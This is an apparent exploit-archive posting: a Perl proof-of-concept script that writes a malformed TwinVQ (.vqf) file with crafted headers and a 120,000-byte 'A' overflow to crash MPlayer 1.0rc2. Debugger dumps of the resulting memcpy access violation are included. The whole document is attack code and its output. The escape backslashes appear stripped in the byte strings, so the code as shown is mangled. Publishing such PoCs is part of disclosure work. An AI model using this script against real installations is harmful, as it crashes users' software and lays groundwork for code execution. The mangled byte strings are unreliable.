mplayertwinvq-overflow.txt
Posted on 16 January 2009
#!/usr/bin/perl # MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC # PoC by Amirreza Aminsalehi "sCORPINo" # (Proud To be an Abay) # scorpino x40 gmail x2e com # Snoop Security Researching Committee # www.snoop-security.com # Originaly this bug discovered by Tobias Klein # advisory @ http://trapkit.de/advisories/TKADV2008-014.txt # Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;) # I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers. # special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members ########################################################################################### # You Can See Debug dumps here: # #(8ec.748): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc #eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32msvcrt.dll - #msvcrt!memcpy+0x33: #77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] #0:000> g #(8ec.748): Access violation - code c0000005 (!!! second chance !!!) #eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc #eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216 #msvcrt!memcpy+0x33: #77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] ########################################################################################### my $file="amir.vqf"; open(my $FILE, ">$file") or die "Cannot open $file: $!"; $head = "x00x01xD4xC0"; #SIZE $head2 = "x43x4fx4dx4d"; #COMM $head3 ="x00x00x00x10x00x00x00x01x00x00x00x60x00x00x00x2c". "x00x00x00x00x4ex41x4dx45x00x00x00x0bx47x69x6cx64". "x65x64x20x43x61x67x65x41x55x54x48x00x00x00x11x42". "x6cx61x63x6bx6dx6fx72x65x91x73x20x4ex69x67x68x74". "x28x63x29x20x00x00x00x04x4ax75x72x61x41x4cx42x4d". "x00x00x00x0dx53x65x63x72x65x74x20x56x6fx79x61x67". "x65x54x52x43x4bx00x00x00x02x30x33x44x41x54x41x0c"; # other headers. Not in mood to separate every one ;) print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p close($FILE); print "$file has been created ";
